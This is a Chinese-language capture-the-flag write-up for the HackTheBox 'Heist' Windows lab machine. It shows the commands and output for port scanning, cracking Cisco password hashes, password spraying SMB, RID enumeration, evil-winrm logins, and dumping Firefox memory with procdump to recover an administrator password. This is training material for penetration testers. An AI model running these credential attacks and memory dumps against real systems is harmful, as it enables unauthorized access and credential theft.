Heist Writeup
靶機資訊
Machine | Description |
---|---|
Name | Heist |
OS | Windows |
Difficulty | Easy |
Author | MinatoTW |
情蒐 Recon
服務掃描
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-23T08:56:19
|_ start_date: N/A
|_clock-skew: -1s
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:32 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ sudo nmap -p80,135,445,5985,49669 -sCV -Pn 10.129.96.157
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 03:55 EST
Nmap scan report for 10.129.96.157
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-23T08:56:19
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.31 seconds
掃完標的發現開啟五個port,分別是HTTP、SMB、WinRM(5985)和不重要,從掃描結果得知HTTP伺服器是IIS 10.0,所以依此推測系統是Windows 10(或是2k16),往下看得知cookie是PHPSESSID
,因此後端是PHP。
HTTP - Port 80
由於不知道網站網址,所以IP直連看看。

伺服器跳轉至/login.php
,由於沒有創建帳號的方式,先使用左下角「Login as guest」,以訪客登入。

得知使用者Hazard
沒辦法正確設定Cisco路由器,向Support尋求協助,並附上 設定檔(在Attachment)。
本階段其餘完成事項
- Web黑箱,沒有找到弱點,而且後端根本沒有DB。
- 由於不知道標的的域名,只能先猜測帳號是:
[email protected]
,並嘗試爆破,失敗。
暴力破解Cisco密碼
那當然是看看設定檔裡寫了什麼!

結果裡面寫了帳號和密碼Hash。
看到這裡,如果沒有接觸過Cisco的網通設備,可能會有點難繼續打下去,但是應該至少可以猜到要爆破Hash,畢竟$1$...
很明顯是MD5 Hash。
解釋一下設定檔?
裡面使用了兩種加密方法,分別是Type 5,使用 MD5 加密(secret 5
),
和Type 7,使用 Vigenere cipher 加密(password 7
),兩個加密方法都有弱點,MD5可以暴力破解,Vigenere cipher是XOR加密法也可以破解。
欲知其他Cisco的Type,請參考KB。
至於我在怎麼知道這種Cisco的密碼可以破解? 那是因為很久以前的工作,需要接手前人的爛攤子,帳號密碼都沒有交接,啊不就好險設備很舊,可以破解QQ
直接上網搜Hash就可以得到第一個密碼。

至於另外兩個Type 7,可以使用GitHub上的破解腳本,或是懶得話可以類似這樣的網站還原密碼。
建議使用腳本比較好,永遠不知道網站會不會偷密碼。
密碼潑灑 Part 1
使用蒐集到的帳號密碼,亂try一通。
WinRM試完沒有,但是SMB就中了!
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agen
取得Hazard的密碼!
內部情蒐 Part 1
SMB目錄詳列
沒戲,沒有東西可以讀。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --shares
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Enumerated shares
SMB 10.129.96.157 445 SUPPORTDESK Share Permissions Remark
SMB 10.129.96.157 445 SUPPORTDESK ----- ----------- ------
SMB 10.129.96.157 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.129.96.157 445 SUPPORTDESK C$ Default share
SMB 10.129.96.157 445 SUPPORTDESK IPC$ READ Remote IPC
RID枚舉使用者
經過許多嘗試,最後發現使用rid才能成功爆出使用者。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
找到新帳號了!蒐集成新的使用者成清單。
密碼潑灑 Part 2
再亂try一次。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ netexec smb 10.129.96.157 -u user2.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\None:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\None:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] Connection Error: Error occurs while reading from remote(104)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
噫!好!我中了!取得Chase
的密碼。
WinRM登入Chase
由於Hazard
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
0e6d4756a8bd6019369427c72e67a0b7
內部情蒐 Part 2
搜尋看看有沒有其他有趣的檔案。
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
Directory: C:\Users\Chase\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/23/2024 1:59 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop> type tod*
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
閱讀桌面下的todo.txt
檔,得知管理員會定期查看issues,也就是稍早取得Cisco設定檔的頁面。
網站原始碼
cd
到C:\\inetpub\
下,發現沒有詳列目錄的權限(不能dir
),但是可以直接讀取檔案(猜),像是login.php
。
*Evil-WinRM* PS C:\inetpub\wwwroot> type lo*
<!DOCTYPE html>
<html lang="en" >
...
<?php
session_start();
if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
if( $_REQUEST['login_username'] === '[email protected]' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
$_SESSION['admin'] = "valid";
header('Location: issues.php');
}
else
header('Location: errorpage.php');
}
else if( isset($_GET['guest']) ) {
if( $_GET['guest'] === 'true' ) {
$_SESSION['guest'] = "valid";
header('Location: issues.php');
}
}
?>
</html>
取得admin
的密碼的sha256 hash,不想爆破,因為多半沒用,如果沒有其他路,再回來破也不遲。
程序詳列
最後在C:\\Program File\
下面發現這台機器裝了Firefox,想說該不會管理者就是用這台機器看issues?於是詳列看看目前執行的程式。
*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
ProcessName Id
----------- --
csrss 360
csrss 476
ctfmon 2120
dllhost 3852
dllhost 6772
dwm 952
explorer 948
firefox 4364
firefox 6460
firefox 6568
firefox 6704
firefox 6980
...
結果真的有。
盜取Firefox的記憶體
Dump記憶體的方式百百種,在此使用微軟的Procdump
1,取得最新的Firefox程序記憶體內容。
*Evil-WinRM* PS C:\Users\Chase\Documents> upload /home/kali/Documents/tools/procdump.exe
Info: Uploading /home/kali/Documents/tools/procdump.exe to C:\Users\Chase\Documents\procdump.exe
Data: 1055944 bytes of 1055944 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -accepteula
...
*Evil-WinRM* PS C:\Users\Chase\Documents> ./procdump.exe -ma 6980
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[16:47:30] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_241223_164730.dmp
[16:47:31] Dump 1 writing: Estimated dump file size is 307 MB.
[16:47:32] Dump 1 complete: 308 MB written in 1.4 seconds
[16:47:32] Dump count reached.
過濾記憶體內容
Firefox的記憶體中,儲存了使用者瀏覽的歷史紀錄,可能包含敏感資訊。於是依據剛才檢視login.php
原始碼,得知密碼以login_password=<PASSWORD>
送出,並以此過濾記憶體。
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ rg -ao 'login_password=([^&]+)' firefox.exe_241223_164730.dmp
2696:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
2896:login_password=4dD!5}x/re8]FBuZ
成功取得管理員密碼。
登入Administrator
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Heist]
└─$ evil-winrm -i 10.129.96.157 -u Administrator -p "4dD\!5}x/re8]FBuZ"
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Des*/*.txt
e3254f34e1f191af2cefaf1f4a8b6224
-
微軟簽名過的原生工具,可以取得程序記憶體內容。 Sysinternals - ProcDump, Microsoft ↩